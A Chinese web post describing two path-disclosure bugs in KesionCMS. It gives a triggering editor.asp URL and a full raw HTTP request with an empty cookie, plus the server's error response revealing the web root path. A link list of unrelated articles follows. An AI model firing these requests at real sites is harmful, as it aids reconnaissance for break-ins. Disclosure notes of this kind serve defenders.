当前位置: 首页 > news >正文

Kesion cms 路径泄露漏洞

暴路径bug 1 :

http://www.xx .com/user/editor.asp?ChannelID=10000&ID=Content

----------------------------------------------------------------------------------------------

暴路径bug 2 :

最近看到一个科汛的cms(kesioncms)的奇怪漏洞,当提交网页时,将cookie字段设置为:=,则会爆出网站的路径,不知道这个是怎么回事,我对asp不熟悉,不做深入研究,留给有心人吧。下面附上数据包:

GET http://www.xxx.net/Item/Show.asp?m=1&d=1 HTTP/1.1
Host: www.xxx.net
Pragma: no-cache
Referer: http://www.xxx.net/Item/Show.asp?m=1&d=16
Connection: Keep-Alive
Cookie: =
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0)

HTTP/1.1 500 Internal Server Error
Date: Sat, 25 Jun 2011 22:23:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 193
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAADARQSQ=EMLJEPBDMHAFNKKIFJFBIGJK; path=/
Cache-control: private

 <font face=”宋体” size=2>错误 ‘80004005′</font>
<p>
<font face=”宋体” size=2>D:\WWWROOT\xxx\WWWROOT\ITEM\../KS_Cls/Kesion.CommonCls.asp</font><font face=”宋体” size=2>,行 3307</font>


相关文章:

  • asp中容错语句的使用
  • 防止SQL注入
  • 解决ASP防SQL注入攻击程序问题
  • Discuz7.X通杀0day(UCenter Home-2.0) poc
  • Kracker路由器破解工具
  • 代码之美 - 如何写出优雅的PHP代码
  • Mysql数据库的安全设置方法大全
  • Struts 2实现文件过滤
  • ewebeditor安全解决方案
  • 文件上传过滤
  • 拦截器实现文件过滤(JSP)
  • LFI本地包含漏洞利用小技巧
  • MSSQL注入防范安全策略大全
  • NWebsec 1.0.3 The Security library for ASP.NET
  • 详细MSSQL注入语句
  • SegmentFault for Android 3.0 发布
  • C学习-枚举(九)
  • egg(89)--egg之redis的发布和订阅
  • ES6语法详解(一)
  • Essential Studio for ASP.NET Web Forms 2017 v2,新增自定义树形网格工具栏
  • java8 Stream Pipelines 浅析
  • LintCode 31. partitionArray 数组划分
  • Lsb图片隐写
  • SAP云平台里Global Account和Sub Account的关系
  • SwizzleMethod 黑魔法
  • TypeScript迭代器
  • 从0搭建SpringBoot的HelloWorld -- Java版本
  • 经典排序算法及其 Java 实现
  • 人脸识别最新开发经验demo
  • 我的业余项目总结
  • 关于Kubernetes Dashboard漏洞CVE-2018-18264的修复公告
  • 机器人开始自主学习,是人类福祉,还是定时炸弹? ...
  • ​LeetCode解法汇总2182. 构造限制重复的字符串
  • (6)添加vue-cookie
  • (C语言)字符分类函数
  • (NO.00004)iOS实现打砖块游戏(十二):伸缩自如,我是如意金箍棒(上)!
  • (二)windows配置JDK环境
  • (附源码)springboot“微印象”在线打印预约系统 毕业设计 061642
  • (每日持续更新)jdk api之FileFilter基础、应用、实战
  • (一) springboot详细介绍
  • (一)搭建springboot+vue前后端分离项目--前端vue搭建
  • (转)Mysql的优化设置
  • **python多态
  • .NET 4.0中使用内存映射文件实现进程通讯
  • .NET Core WebAPI中使用Log4net 日志级别分类并记录到数据库
  • .NET 实现 NTFS 文件系统的硬链接 mklink /J(Junction)
  • .Net(C#)自定义WinForm控件之小结篇
  • .NET牛人应该知道些什么(2):中级.NET开发人员
  • .ui文件相关
  • @Autowired自动装配
  • @SuppressWarnings(unchecked)代码的作用
  • [ vulhub漏洞复现篇 ] struts2远程代码执行漏洞 S2-005 (CVE-2010-1870)
  • [2017][note]基于空间交叉相位调制的两个连续波在few layer铋Bi中的全光switch——
  • [2021ICPC济南 L] Strange Series (Bell 数 多项式exp)
  • [④ADRV902x]: Digital Filter Configuration(发射端)